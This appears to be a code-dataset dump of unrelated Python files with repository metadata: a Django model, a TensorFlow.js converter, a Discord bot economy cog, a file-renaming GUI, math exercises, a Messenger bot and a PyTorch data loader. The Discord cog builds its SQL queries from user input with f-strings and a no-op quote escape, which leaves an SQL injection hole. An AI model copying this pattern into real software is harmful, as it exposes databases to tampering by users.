('1', 'modal1'),
('2', 'modal2'),
('3', 'modal3'),
('4', 'modal4'),
)
name = models.CharField(max_length=128)
entry = models.TextField(max_length=128)
space = models.CharField(max_length=1, choices=SPACES)
def __unicode__(self):
return self.name
| UTF-8 | Python | false | false | 425 | py | 11 | models.py | 9 | 0.595294 | 0.56 | 0 | 18 | 22.611111 | 58 |
frreiss/Refactored-MAX-Object-Detector | 5,377,299,079,261 | 97d0f165b1428f13d7449e3a39a8037b0d45afd9 | 7900f61eefb06de9636d7aabb31dfb501b3a791e | /tensorflowjs/convert.py | fec7352351306de6abf0df2650b753d2e380bc89 | [
"Apache-2.0"
] | permissive | https://github.com/frreiss/Refactored-MAX-Object-Detector | 9c02f7a661f2ca960b8ab574a55a5c9950f381b2 | eed1aa3fa1aec8dc0a2821006263379788951868 | refs/heads/master | 2022-07-09T03:06:20.251056 | 2019-06-14T17:50:59 | 2019-06-14T17:50:59 | 173,006,626 | 2 | 2 | Apache-2.0 | false | 2022-06-25T01:00:19 | 2019-02-27T23:31:05 | 2019-06-14T17:51:03 | 2022-06-25T01:00:16 | 99 | 1 | 2 | 5 | Python | false | false | # import tensorflow as tf
import tensorflowjs as tfjs
from tensorflowjs.converters import tf_saved_model_conversion_pb
saved_model_path = "../saved_model_js"
output_path = "web_model"
def convert_to_tfjs(input_dir, output_dir):
# Reference: https://github.com/tensorflow/tfjs-converter/blob/0.8.x/python/tensorflowjs/converters/converter.py
output_node_names = "detection_boxes,detection_classes,detection_scores,num_detections"
tf_saved_model_conversion_pb.convert_tf_saved_model(input_dir,
output_node_names,
output_dir,
saved_model_tags='serve',
quantization_dtype=None,
skip_op_check=False,
strip_debug_ops=True)
def main():
convert_to_tfjs(saved_model_path, output_path)
if __name__ == "__main__":
main() | UTF-8 | Python | false | false | 784 | py | 18 | convert.py | 17 | 0.69898 | 0.696429 | 0 | 25 | 30.4 | 116 |
Desiiii/Kumiko | 6,158,983,142,997 | c9bf4489d837f47a8a5cb0a230c7c2f32eb48414 | 1dfab618268f76cb0946c47506f5e6f6cc9f0864 | /cogs/currency.py | 9bca5559f1e0be8850380e8eadcac1c0a9fc5b15 | [
"MIT"
] | permissive | https://github.com/Desiiii/Kumiko | fc602dfd8764f1774e2b44d42f6b30b0bb0d02cd | 8602a042fd87bd9d54d18dc0cc4aaf15700e297e | refs/heads/master | 2021-09-14T23:03:48.791583 | 2018-05-21T19:14:46 | 2018-05-21T19:14:46 | 113,623,786 | 3 | 2 | null | null | null | null | null | null | null | null | null | null | null | null | null | import pymysql
import discord
import json
import random
import traceback
import requests
import asyncio
from discord.ext import commands
from .utils.tools import *
from .utils.db import *
with open('config.json', 'r') as f:
config = json.load(f)
class Currency:
def __init__(self, bot):
self.bot = bot
@commands.command()
@commands.cooldown(rate=1, per=300, type=commands.BucketType.user)
async def loot(self, ctx):
"""Loot the current channel!
You can get a maximum of 100 credits. You might also recieve none."""
db = pymysql.connect(config['db']['ip'], config['db']['user'], config['db']['password'], config['db']['name'],
charset='utf8mb4')
cur = db.cursor()
value = random.randint(0, 100)
cur.execute(
f'INSERT INTO profiles (userid, description, bal, marryid, reps) VALUES ({ctx.author.id}, NULL, {value}, NULL, 0) ON DUPLICATE KEY UPDATE bal = bal + {value}')
db.commit()
if value == 0:
await ctx.send(":tada: Congratulations, you looted- oh, I-I'm sorry. You didn't loot any credits!")
db.close()
return
await ctx.send(":tada: You looted **{}** credits!".format(value))
db.close()
@commands.command(aliases=["bal"])
async def balance(self, ctx, *, user: discord.Member = None):
"""Check your current balance"""
db = pymysql.connect(config['db']['ip'], config['db']['user'], config['db']['password'], config['db']['name'],
charset='utf8mb4')
cur = db.cursor()
if user is None:
user = ctx.author
await ctx.send(f":gem: **{user.display_name}** has a balance of **${get_balance(user.id)}**")
db.close()
@commands.command()
@commands.cooldown(rate=1, per=86400, type=commands.BucketType.user)
async def daily(self, ctx):
"""Recieve your daily reward."""
db = pymysql.connect(config['db']['ip'], config['db']['user'], config['db']['password'], config['db']['name'],
charset='utf8mb4')
cur = db.cursor()
cur.execute(
f'INSERT INTO profiles (userid, description, bal, marryid, reps) VALUES ({ctx.author.id}, NULL, 150, NULL, 0) ON DUPLICATE KEY UPDATE bal = bal + 150')
db.commit()
await ctx.send(":white_check_mark: You successfully claimed your daily credits of **$150**")
db.close()
@commands.command()
async def profile(self, ctx, *, user: discord.Member = None):
"""Check your profile or the profile of another user."""
if user is None:
user = ctx.author
if user.bot:
await ctx.send(":x: Bots don't have profiles.")
return
if get_married(user.id):
m = await self.bot.get_user_info(get_married(user.id))
else:
m = "Nobody"
em = discord.Embed(
title=user.display_name + "'s profile",
description=get_description(user.id),
color=ctx.author.color
).add_field(
name="💰 Balance",
value=get_balance(user.id)
).add_field(
name="💜 Married With",
value=m
).add_field(
name="🏅 Reputation",
value=get_reps(user.id)
).set_thumbnail(
url=user.avatar_url.replace("?size=1024", "")
)
await ctx.send(embed=em)
@commands.command()
async def marry(self, ctx, *, user: discord.Member):
"""Marry a user."""
if len(ctx.message.mentions) == 0:
await ctx.send(":x: Mention the user you want to marry, baka!")
return
if user.id == ctx.author.id:
await ctx.send(":x: I-I'll marry you! I-I mean, y-you can't marry yourself... baka!")
return
if get_married(ctx.author.id) is not None:
await ctx.send(":x: You are already married!")
return
if get_married(user.id) is not None:
await ctx.send(":x: That user is already married!")
return
if user.bot:
await ctx.send(":x: You can't marry a bot >~>")
return
await ctx.send(
f"{user.display_name}, say `yes` or `no` to the marriage proposal from {ctx.author.display_name}")
def check(m):
return m.author.id == user.id and m.channel == ctx.channel
try:
msg = await self.bot.wait_for('message', check=check, timeout=60.0)
except asyncio.TimeoutError:
await ctx.send("Proposal timed out :(")
else:
if msg.content.lower() == 'no':
await ctx.send("Proposal denied. :(")
elif msg.content.lower() == 'yes':
db = pymysql.connect(config['db']['ip'], config['db']['user'], config['db']['password'],
config['db']['name'], charset='utf8mb4')
cur = db.cursor()
cur.execute(
f'INSERT INTO profiles (userid, description, bal, marryid, reps) VALUES ({ctx.author.id}, NULL, 0, {user.id}, 0) ON DUPLICATE KEY UPDATE marryid = {user.id}')
cur.execute(
f'INSERT INTO profiles (userid, description, bal, marryid, reps) VALUES ({user.id}, NULL, 0, {ctx.author.id}, 0) ON DUPLICATE KEY UPDATE marryid = {ctx.author.id}')
await ctx.send(f":tada: {ctx.author.display_name} and {user.display_name} are now married!")
db.commit()
db.close()
else:
await ctx.send("Improper response, cancelling proposal.")
@commands.command()
async def divorce(self, ctx):
"""Divorce yourself from the person you are married to."""
if get_married(ctx.author.id):
user = get_married(ctx.author.id)
db = pymysql.connect(config['db']['ip'], config['db']['user'], config['db']['password'],
config['db']['name'], charset='utf8mb4')
cur = db.cursor()
cur.execute(
f'INSERT INTO profiles (userid, description, bal, marryid, reps) VALUES ({ctx.author.id}, NULL, 0, NULL, 0) ON DUPLICATE KEY UPDATE marryid = NULL')
cur.execute(
f'INSERT INTO profiles (userid, description, bal, marryid, reps) VALUES ({user}, "{get_description(user)}", {get_balance(user)}, NULL, 0) ON DUPLICATE KEY UPDATE marryid = NULL')
await ctx.send(":white_check_mark: You're single now I guess. That's nice.")
db.commit()
db.close()
else:
await ctx.send(":x: You can't get a divorce if you aren't married.")
@commands.command(aliases=["desc"])
async def description(self, ctx, *, description: str):
"""Set your description for your profile."""
if len(description) >= 300:
await ctx.send(":x: That description is too long! Max is 300 characters.")
return
db = pymysql.connect(config['db']['ip'], config['db']['user'], config['db']['password'], config['db']['name'],
charset='utf8mb4')
cur = db.cursor()
descri = description.replace('"', '\"')
cur.execute(
f'INSERT INTO profiles (userid, description, bal, marryid, reps) VALUES ({ctx.author.id}, "{descri}", 0, NULL, 0) ON DUPLICATE KEY UPDATE description = "{descri}"')
db.commit()
db.close()
await ctx.send(":tada: Set your description. Check it out on `{}profile`!".format(ctx.prefix))
@commands.group(aliases=['top', 'leaderboard'])
async def richest(self, ctx):
"""Check the richest users.
You can also check `richest rep`"""
if ctx.invoked_subcommand is None:
db = pymysql.connect(config['db']['ip'], config['db']['user'], config['db']['password'], config['db']['name'],
charset='utf8mb4')
cur = db.cursor()
cur.execute(f'SELECT userid,bal FROM profiles ORDER BY bal DESC LIMIT 15')
results = cur.fetchall()
msg = ""
for i in range(len(results)):
row = results[i]
user = self.bot.get_user(int(row[0]))
if user is None:
user = row[0]
n = i + 1
if n < 10:
n = f"0{i+1}"
msg += f":star: **{n} | {user}** - ${row[1]}\n"
em = discord.Embed(
title="Richest Users",
description=msg,
color=ctx.author.color
)
await ctx.send(embed=em)
@richest.command(name="rep")
async def _rep(self, ctx):
db = pymysql.connect(config['db']['ip'], config['db']['user'], config['db']['password'], config['db']['name'],
charset='utf8mb4')
cur = db.cursor()
cur.execute(f'SELECT userid,reps FROM profiles ORDER BY reps DESC LIMIT 15')
results = cur.fetchall()
msg = ""
for i in range(len(results)):
row = results[i]
user = self.bot.get_user(int(row[0]))
if user is None:
user = row[0]
n = i + 1
if n < 10:
n = f"0{i+1}"
msg += f":star: **{n} | {user}** - {row[1]} points\n"
em = discord.Embed(
title="Richest Users in Reputation",
description=msg,
color=ctx.author.color
)
await ctx.send(embed=em)
@commands.command()
@commands.cooldown(rate=1, per=43200, type=commands.BucketType.user)
async def rep(self, ctx, *, user: discord.Member):
"""Rep a user."""
if user.id == ctx.author.id:
await ctx.send(":x: B-baka! You can't rep yourself.")
ctx.command.reset_cooldown(ctx)
return
if user.bot:
await ctx.send(":x: Bots can't be repped.")
ctx.command.reset_cooldown(ctx)
return
db = pymysql.connect(config['db']['ip'], config['db']['user'], config['db']['password'], config['db']['name'],
charset='utf8mb4')
cur = db.cursor()
cur.execute(
f'INSERT INTO profiles (userid, description, bal, marryid, reps) VALUES ({user.id}, NULL, 0, NULL, 1) ON DUPLICATE KEY UPDATE reps = reps + 1')
db.commit()
db.close()
await ctx.send(f":ok_hand: Added one reputation point to **{user.display_name}**")
@commands.command()
@commands.cooldown(rate=1, per=15, type=commands.BucketType.user)
async def gamble(self, ctx, amount: int):
"""Gamble your money away."""
if amount > get_balance(ctx.author.id):
await ctx.send(":x: B-baka! You can't gamble more than what you have!")
ctx.command.reset_cooldown(ctx)
return
if amount <= 0:
await ctx.send(":x: Seriously...")
ctx.command.reset_cooldown(ctx)
return
db = pymysql.connect(config['db']['ip'], config['db']['user'], config['db']['password'], config['db']['name'],
charset='utf8mb4')
cur = db.cursor()
var = random.randint(1, 3)
if var == 2:
cur.execute(f'UPDATE profiles SET bal = bal + {round(0.75 * amount)} WHERE userid = {ctx.author.id}')
await ctx.send(f":tada: Congratulations, you won **${round(0.75 * amount)}** and got to keep what you had!")
else:
cur.execute(f'UPDATE profiles SET bal = bal - {amount} WHERE userid = {ctx.author.id}')
await ctx.send(f":sob: You lost {amount} credits!")
db.commit()
db.close()
@commands.command()
@commands.cooldown(rate=1, per=5, type=commands.BucketType.user)
async def transfer(self, ctx, user: discord.Member, amount: int):
"""Transfer money to another user."""
if user.id == ctx.author.id:
await ctx.send(":x: Baka! You can't transfer to yourself.")
return
if user.bot:
await ctx.send(":x: You can't transfer to a bot.")
return
if amount > get_balance(ctx.author.id):
await ctx.send(":x: You're broke.")
return
db = pymysql.connect(config['db']['ip'], config['db']['user'], config['db']['password'], config['db']['name'],
charset='utf8mb4')
cur = db.cursor()
cur.execute(
f'INSERT INTO profiles (userid, description, bal, marryid, reps) VALUES ({user.id}, NULL, {amount}, NULL, 0) ON DUPLICATE KEY UPDATE bal = bal + {amount}')
cur.execute(f'UPDATE profiles SET bal = bal - {amount} WHERE userid = {ctx.author.id}')
db.commit()
db.close()
await ctx.send(f":ok_hand: Transfered **${amount}** to **{user.display_name}**")
@commands.command()
@commands.cooldown(rate=1, per=150, type=commands.BucketType.user)
async def bet(self, ctx, colour: str, amount: int):
"""Bet on a horse race using the colour of the horse."""
winmsgs = [
"You bet ${0} on the {1} horse and won {2} credits!", # .format(amount, colour, gains)
"You bet ${0} on the {1} horse...\n\nIt was a close match, but the {1} horse won, making you win {2} credits!",
"You wanted to bet ${0} on the horse your friend chose, but instead you bet on the {1} horse. You won {2} credits anyway!"
]
losemsgs = [
"You bet ${0} on the {1} horse, but the {2} horse won instead. You lost your bet.",
"You went with your friend's vote of the {1} horse, betting ${0}, but you lost your bet when the {2} horse won.",
"You bet ${0} on the {1} horse, but {2} won instead."
]
colours = ["red", "green", "blue"]
if amount > get_balance(ctx.author.id):
await ctx.send(":x: B-baka! You can't gamble more than what you have!")
ctx.command.reset_cooldown(ctx)
return
if not colour.lower() in colours:
await ctx.send(
":x: I-I'm sorry, that is not a valid colour! The valid options are: `{}`".format("`, `".join(colours)))
ctx.command.reset_cooldown(ctx)
return
if amount <= 0:
await ctx.send(":x: Seriously...")
ctx.command.reset_cooldown(ctx)
return
c = random.choice(colours)
gains = (amount * 0.80)
db = pymysql.connect(config['db']['ip'], config['db']['user'], config['db']['password'], config['db']['name'],
charset='utf8mb4')
cur = db.cursor()
if c == colour.lower():
await ctx.send(f":tada: {random.choice(winmsgs).format(amount, colour, round(gains))}")
cur.execute(f'UPDATE profiles SET bal = bal + {round(gains)} WHERE userid = {ctx.author.id}')
else:
await ctx.send(f":sob: {random.choice(losemsgs).format(amount, colour, c)}")
cur.execute(f'UPDATE profiles SET bal = bal - {amount} WHERE userid = {ctx.author.id}')
db.commit()
db.close()
@commands.command()
@commands.cooldown(rate=1, per=43200, type=commands.BucketType.user)
async def crime(self, ctx):
"""Commit a crime! This has a larger chance of failing but has a lower ratelimit than daily with a higher payout.
Note: this command requires you to have a minimum balance of $300!"""
losses = [
"You took candy from a baby... and felt bad about it. You lost ${}.",
"You got caught by the FBI. Pay ${} to get out of jail",
"Your memes are terrible. You get ${} taken away because of it."
]
wins = [
"You successfully robbed a bank for ${}.",
"You did the thing. Congratulations. You got ${}"
]
n = random.randint(1, 5)
if get_balance(ctx.author.id) < 300:
await ctx.send(":x: You can't commit a crime without the $300 to fund it.")
return
db = pymysql.connect(config['db']['ip'], config['db']['user'], config['db']['password'], config['db']['name'],
charset='utf8mb4')
cur = db.cursor()
money = random.randint(150, 300)
if n == 1:
await ctx.send(f":tada: {random.choice(wins).format(money)}")
cur.execute(f'UPDATE profiles SET bal = bal + {money} WHERE userid = {ctx.author.id}')
else:
cur.execute(f'UPDATE profiles SET bal = bal - {money} WHERE userid = {ctx.author.id}')
await ctx.send(f":sob: {random.choice(losses).format(money)}")
db.commit()
db.close()
def setup(bot):
bot.add_cog(Currency(bot))
| UTF-8 | Python | false | false | 17,276 | py | 16 | currency.py | 15 | 0.532866 | 0.522789 | 0 | 368 | 44.921196 | 194 |
Kaemer1645/Numerator | 11,544,872,118,891 | 15b3d72807a52d714883572e3a88f947f6deb6de | ca360ae75cd82c0836b072dd6b446986b6e96301 | /gui.py | d7c14c882396172dd1940def3fb5b251664d50ce | [] | no_license | https://github.com/Kaemer1645/Numerator | aec2dfd37af7c98ae61dae9a5b664f516fa15c7a | b5ddd87b4ac64328f97eaf954c731647d95226dc | refs/heads/main | 2023-02-06T08:13:33.232973 | 2020-12-23T22:01:52 | 2020-12-23T22:01:52 | 310,949,513 | 0 | 0 | null | false | 2020-11-14T23:16:47 | 2020-11-07T23:19:35 | 2020-11-08T13:04:56 | 2020-11-14T23:16:46 | 17 | 0 | 0 | 0 | Python | false | false | # This Python file uses the following encoding: utf-8
import sys, shutil
from PySide2.QtUiTools import QUiLoader
from PySide2.QtWidgets import QApplication, QFileDialog, QPushButton, QLineEdit
from PySide2 import QtXml
from PySide2.QtCore import QFile, QIODevice
from PySide2 import QtXml
from numerator import Numerator#, Numerator_run
import webbrowser
class Main:
def __init__(self):
ui_file_name = "dialog.ui"
ui_file = QFile(ui_file_name)
if not ui_file.open(QIODevice.ReadOnly):
print("Cannot open {}: {}".format(ui_file_name, ui_file.errorString()))
sys.exit(-1)
loader = QUiLoader()
self.window = loader.load(ui_file)
ui_file.close()
if not self.window:
print(loader.errorString())
sys.exit(-1)
self.window.show()
#def silnik(self):
#test = (self.selectDirectory(), self.first_file(),self.new_file_name(),self.first_number(), self.steps(),self.file_type())
#return print(test)
def engine(self):
#print(self.directory())
self.numerator = Numerator(directory=self.directory(), first_file=self.first_file(),
prefix=self.new_file_name(), first_number=self.first_number(),
step=self.steps(), file_type=self.file_type())
check = self.numerator.run() #to musimy zapisac w miejscu, bo jak zrobimy z tego for'a nizej, to zrobi nam petle podwojnie
for file in check:
print('Change from "%s" to "%s"'% (file[0],file[1]))
'''for single_print in self.numerator.run():
print(single_print)'''
def execution(self):
self.exec = Numerator(directory=self.directory(), first_file=self.first_file(),
prefix=self.new_file_name(), first_number=self.first_number(),
step=self.steps(), file_type=self.file_type())
change = self.exec.run()
for exec_file in change:
print('Change from "%s" to "%s"'% (exec_file[0],exec_file[1]))
shutil.move(exec_file[0],exec_file[1])
def selectDirectory(self):
#dialog = QFileDialog()
directory = str(QFileDialog.getExistingDirectory())
self.window.le_dir.setText('{}'.format(directory))
#return print(directory)
# def print_dir(self):
# pri = self.window.le_dir.text()
# return print(pri)
def directory(self):
dir_text = self.window.le_dir.text()
return dir_text
def first_file(self):
label = self.window.le_first_file.text()
return label
def first_number(self):
number = self.window.le_file_number.text()
return int(number)
def new_file_name(self):
prefix = self.window.le_prefix.text()
return prefix
def steps(self):
steps = self.window.le_step.text()
return int(steps)
def file_type(self):
type = self.window.le_file_type.text()
return type
def github(self):
open = webbrowser.open('https://github.com/Kaemer1645/Numerator')
return open
def run(self):
self.window.pb_dir.clicked.connect(self.selectDirectory)
#self.window.pb_dir.clicked.connect(self.silnik)
self.window.pb_test.clicked.connect(self.engine)
#self.window.pb_run.clicked.connect(self.print_dir)
self.window.pb_run.clicked.connect(self.execution)
self.window.pb_github.clicked.connect(self.github)
if __name__ == "__main__":
app = QApplication([])
inst = Main()
inst.run()
sys.exit(app.exec_())
| UTF-8 | Python | false | false | 3,667 | py | 5 | gui.py | 4 | 0.602672 | 0.597764 | 0 | 103 | 34.601942 | 131 |
daniel-reich/turbo-robot | 4,612,794,887,956 | fc668b0f4beb102abcf466f2f54e0323dd94b77f | f0d713996eb095bcdc701f3fab0a8110b8541cbb | /k9usvZ8wfty4HwqX2_2.py | 6df3da8982061b94fd50d4d07581a39b1c4e148e | [] | no_license | https://github.com/daniel-reich/turbo-robot | feda6c0523bb83ab8954b6d06302bfec5b16ebdf | a7a25c63097674c0a81675eed7e6b763785f1c41 | refs/heads/main | 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | """
Create a function to check whether a given number is **Cuban Prime**. A cuban
prime is a prime number that is a solution to one of two different specific
equations involving third powers of x and y. For this challenge we are only
concerned with the cuban numbers from the **first equation**. We **ignore**
the cuban numbers from the **second equation**.
### Equation Form
p = (x^3 - y^3)/(x - y), x = y + 1, y > 0
... and the first few cuban primes from this equation are 7, 19, 37, 61, 127,
271.
### Examples
cuban_prime(7) ➞ "7 is cuban prime"
cuban_prime(9) ➞ "9 is not cuban prime"
cuban_prime(331) ➞ "331 is cuban prime"
cuban_prime(40) ➞ "40 is not cuban prime"
### Notes
* The inputs are positive integers only.
* Check the **Resources** for help.
"""
is_prime=lambda p:p>1and all(p%i for i in range(2,int(p**0.5+1)))
def cuban_prime(n):
for y in range(n):
if n==3*y**2+3*y+1 and is_prime(n):return str(n)+' is cuban prime'
return str(n)+' is not cuban prime'
| UTF-8 | Python | false | false | 1,045 | py | 8,294 | k9usvZ8wfty4HwqX2_2.py | 8,294 | 0.644444 | 0.605797 | 0 | 39 | 25.461538 | 77 |
alexisdenisew/finalproj | 17,798,344,500,159 | 5c3d355db23dce040139a7fcece8c5c3e9beda85 | adad38555b9fa6857e1e5ef697d84a16b91b986e | /bubble/peepthis/apps.py | 87dcaf3566d3693cc847bcee784437920d61decd | [] | no_license | https://github.com/alexisdenisew/finalproj | 6723d71a123a9509dae9ef9c72c47633d12e22bc | 7d25a3934474198fa5e357750447ccbaf95d8a53 | refs/heads/master | 2021-01-20T02:22:49.518058 | 2017-08-24T16:40:21 | 2017-08-24T16:40:21 | 101,317,949 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from django.apps import AppConfig
class PeepthisConfig(AppConfig):
name = 'peepthis'
| UTF-8 | Python | false | false | 91 | py | 14 | apps.py | 3 | 0.758242 | 0.758242 | 0 | 5 | 17.2 | 33 |
mramirid/Metode_Numerik | 5,171,140,624,888 | 68295d1111f468c2bde405c11f26ed6efd5d76ae | df0e76ed7314475123a1adfe72b7010faacd3152 | /Biseksi.py | f955c2e7c5d67c99cd1c6444a89c27a5f91346e7 | [] | no_license | https://github.com/mramirid/Metode_Numerik | 4963610c87300807b1d204beb0b318fe74fcc383 | f1c741941b288a32da04ac68da71aee652f72546 | refs/heads/master | 2020-04-03T01:08:03.052475 | 2019-01-10T12:58:20 | 2019-01-10T12:58:20 | 154,920,536 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Oct 25 20:50:25 2018
@author: mramirid
Metode biseksi; f(x) = x^2 - e^x + 5
"""
import pandas as pd
from Fitur.parser import Parser
from Fitur.plot import Plot
persamaan = input('Persamaan\t: ')
batas_bawah = float(input('Batas bawah\t: ')) # a
batas_atas = float(input('Batas atas\t: ')) # b
# Membuat objek parser
parser = Parser()
# Mengeset persamaan f(x)
parser.set_function(persamaan)
# Cek jika f(a) * f(b) > 0, maka berhenti
if (parser.function(batas_bawah) * parser.function(batas_atas)) > 0:
print("Tidak ada akar di dalam rentang tersebut!")
exit()
# Buat tabel
df = pd.DataFrame(columns = ['a', 'b', 'x', 'f(x)', 'f(a)', 'Keterangan', 'Error'])
# Inisialisasi baris pertama
x = (batas_bawah + batas_atas) / 2
fx = parser.function(x)
fa = parser.function(batas_bawah)
keterangan = 'Berlainan tanda' if fx * fa < 0 else ''
df.loc[0] = [batas_bawah, batas_atas, x, fx, fa, keterangan, abs(fx)]
toleransi = 10e-07
index = 1
while abs(fx) > toleransi:
if fa * fx < 0:
batas_atas = x
else:
batas_bawah = x
x = (batas_bawah + batas_atas) / 2
fx = parser.function(x)
fa = parser.function(batas_bawah)
keterangan = 'Berlainan tanda' if fx * fa < 0 else ''
# Menambah baris
df.loc[index] = [batas_bawah, batas_atas, x, fx, fa, keterangan, abs(fx)]
index += 1
plot = Plot()
plot.buat_kurva(x, persamaan)
plot.tampilkan_kurva()
# Tampilkan seluruh kolom, karena by default output df disingkat
pd.set_option('display.max_columns', 7)
print() # Enter
print(df)
print('\nRoot\t: %.8f' % x)
print('Error\t: %.8f' % abs(fx)) | UTF-8 | Python | false | false | 1,684 | py | 9 | Biseksi.py | 8 | 0.634204 | 0.614608 | 0 | 69 | 23.42029 | 83 |
KowalskiThomas/PyMessenger | 11,450,382,841,626 | 24e509749f10cbf1ebaa3afd1e383dd7387fd5b2 | 0a8ee7e412d2c81c9c34135f190ea7b75dc5f04b | /bot.py | 73e7a329880e0a6ff89cb45590d8bc368cb8b5a4 | [] | no_license | https://github.com/KowalskiThomas/PyMessenger | 3736aa2ce1de17f511018c2dffada058254f3138 | ede15f17fad0223572c577acfebbea5301799f9b | refs/heads/master | 2020-04-21T07:36:43.061761 | 2019-02-24T16:40:33 | 2019-02-24T16:40:33 | 169,396,284 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import requests
from statesmanager import StatesManager
from server import Server
# NotificationType, ContentType, QuickReply
from classes import Message, MessagingEntry
from function_registry import FunctionRegistry
import utils
DEFAULT_API_VERSION = 2.6
class User:
def __init__(self, bot, id_: int):
self.id: int = id_
self.bot: Bot = bot
def set_state(self, new_state: str):
self.bot.states.set_state(self.id, new_state)
@property
def state(self):
return self.bot.states.get_state(self.id)
def send(self, content):
self.bot.send(self.id, content)
# noinspection PyMethodMayBeStatic
class Bot:
handlers = dict()
states = StatesManager()
server = Server()
def __init__(self, access_token, app_secret=None, api_version=None):
Bot.server.register_bot(self)
self.api_version = api_version if api_version else DEFAULT_API_VERSION
self.app_secret = app_secret
self.graph_url = 'https://graph.facebook.com/v{0}'.format(
self.api_version)
self.access_token = access_token
self._auth_args = None
self.always_typing_on = False
self.always_mark_seen = False
@property
def auth_args(self):
if not hasattr(self, '_auth_args'):
auth = {
'access_token': self.access_token
}
if self.app_secret is not None:
appsecret_proof = utils.generate_appsecret_proof(
self.access_token, self.app_secret)
auth['appsecret_proof'] = appsecret_proof
self._auth_args = auth
return self._auth_args
def process_quick_reply(self, entry: MessagingEntry):
p = entry.quick_reply_payload
if not p:
return
if p.startswith("SetState:"):
state = p.split(":")[1]
print("Setting state to {}".format(state))
entry.sender.set_state(state)
elif p.startswith("Execute:"):
f_ident = p.split(":")[1]
to_call = FunctionRegistry.get(f_ident)
if to_call:
print(
"Executing function {} ({})".format(
to_call.__name__, f_ident))
# Set continue_processing before calling the function so the
# user can change this behaviour
entry.continue_processing = False
to_call(entry)
else:
print(
"Couldn't find function to execute in FunctionRegistry ({}).".format(f_ident))
else:
print("Unsupported payload: {}".format(p))
def process_payloads(self, entry: MessagingEntry):
self.process_quick_reply(entry)
if entry.continue_processing:
# ...
pass
def on_request(self, data: MessagingEntry):
data.sender = User(self, data.sender)
print("Message: {}".format(data.message))
if self.always_typing_on:
self.typing_on(data.sender)
if self.always_mark_seen:
self.mark_seen(data.sender)
self.process_payloads(data)
# Handlers may change user's state and want to immediately call next state's handler
# That's why we make continue_processing False every time we call a handler, and if the next handler has to be
# called, the called handler will have made continue_processing True.
while data.continue_processing:
state = data.sender.state
if state in self.handlers:
for f in self.handlers[state]:
data.continue_processing = False
f(self, data)
else:
print("Unregistered state: {}".format(state))
else:
print("State handlers not processed (message already processed).")
def send(self, user_id, message: Message):
if isinstance(message, str):
message = Message(content=message)
assert(isinstance(message, Message))
payload = {
"recipient": {
"id": user_id
},
"message": dict(),
"notification_type": message.notification_type.value,
"messaging_type": message.message_type.value
}
if message.content:
payload["message"]["text"] = message.content
if message.quick_replies:
payload["message"]["quick_replies"] = [x.to_dict()
for x in message.quick_replies]
if message.metadata:
payload["message"]["metadata"] = message.metadata
if message.tag:
payload["tag"] = message.tag
self.send_raw(payload)
def typing_on(self, user_id):
if isinstance(user_id, User):
user_id = user_id.id
payload = {
"recipient": {
"id": user_id
},
"sender_action": "typing_on"
}
self.send_raw(payload)
def typing_off(self, user_id):
if isinstance(user_id, User):
user_id = user_id.id
payload = {
"recipient": {
"id": user_id
},
"sender_action": "typing_off"
}
self.send_raw(payload)
def mark_seen(self, user_id):
if isinstance(user_id, User):
user_id = user_id.id
payload = {
"recipient": {
"id": user_id
},
"sender_action": "mark_seen"
}
self.send_raw(payload)
def send_raw(self, payload):
request_endpoint = '{0}/me/messages'.format(self.graph_url)
response = requests.post(
request_endpoint,
headers={
"Authorization": "Bearer {}".format(self.access_token)
},
params=self.auth_args,
json=payload
)
result = response.json()
print(result)
return result
Bot.server.start()
| UTF-8 | Python | false | false | 6,077 | py | 14 | bot.py | 13 | 0.544841 | 0.543854 | 0 | 202 | 29.084158 | 118 |
HCPLab-SYSU/SSGRL | 2,576,980,411,050 | e2284607c76b2a47965af282653a15e40afc1e71 | f0f444c6d3f7a51a3847baf2983fd35eba2d9702 | /utils/transforms.py | 3cde45c9d55a73408150d681e9254bf25f8447af | [] | no_license | https://github.com/HCPLab-SYSU/SSGRL | 3204addf61917e11c370ecea10b64c7476825441 | ea47ccb2cf55ff37c5a91fc5a6974bdbc9ab6679 | refs/heads/master | 2022-05-20T06:29:26.612648 | 2022-04-27T13:12:25 | 2022-04-27T13:12:25 | 200,573,386 | 164 | 42 | null | false | 2022-01-22T07:01:20 | 2019-08-05T03:09:08 | 2022-01-19T20:28:27 | 2020-05-20T02:07:27 | 3,638 | 135 | 28 | 16 | Python | false | false | from datasets.vgdataset import VGDataset
from datasets.cocodataset import CoCoDataset
from datasets.voc07dataset import Voc07Dataset
from datasets.voc12dataset import Voc12Dataset
import torchvision.transforms as transforms
from torch.utils.data import DataLoader
def get_train_test_set(train_dir, test_dir, train_anno, test_anno, train_label=None, test_label=None,args = None):
print('You will perform multi-scale on images for scale 640')
normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
scale_size = args.scale_size
crop_size = args.crop_size
train_data_transform = transforms.Compose([transforms.Resize((scale_size, scale_size)),
transforms.RandomChoice([transforms.RandomCrop(640),
transforms.RandomCrop(576),
transforms.RandomCrop(512),
transforms.RandomCrop(384),
transforms.RandomCrop(320)]),
transforms.Resize((crop_size, crop_size)),
transforms.ToTensor(),
normalize])
test_data_transform = transforms.Compose([transforms.Resize((scale_size, scale_size)),
transforms.CenterCrop(crop_size),
transforms.ToTensor(),
normalize])
if args.dataset == 'COCO':
train_set = CoCoDataset(train_dir, train_anno, train_data_transform, train_label)
test_set = CoCoDataset(test_dir, test_anno, test_data_transform, test_label)
elif args.dataset == 'VG':
train_set = VGDataset(train_dir, train_anno, train_data_transform, train_label)
test_set = VGDataset(test_dir, test_anno, test_data_transform, test_label)
elif args.dataset == 'VOC2007':
train_set = Voc07Dataset(train_dir, train_anno, train_data_transform, train_label)
test_set = Voc07Dataset(test_dir, test_anno, test_data_transform, test_label)
elif args.dataset == 'VOC2012':
train_set = Voc12Dataset(train_dir, train_anno, train_data_transform, train_label)
test_set = Voc12Dataset(test_dir, test_anno, test_data_transform, test_label)
else:
print('%s Dataset Not Found'%args.dataset)
exit(1)
train_loader = DataLoader(dataset=train_set,
num_workers=args.workers,
batch_size=args.batch_size,
shuffle = True)
test_loader = DataLoader(dataset=test_set,
num_workers=args.workers,
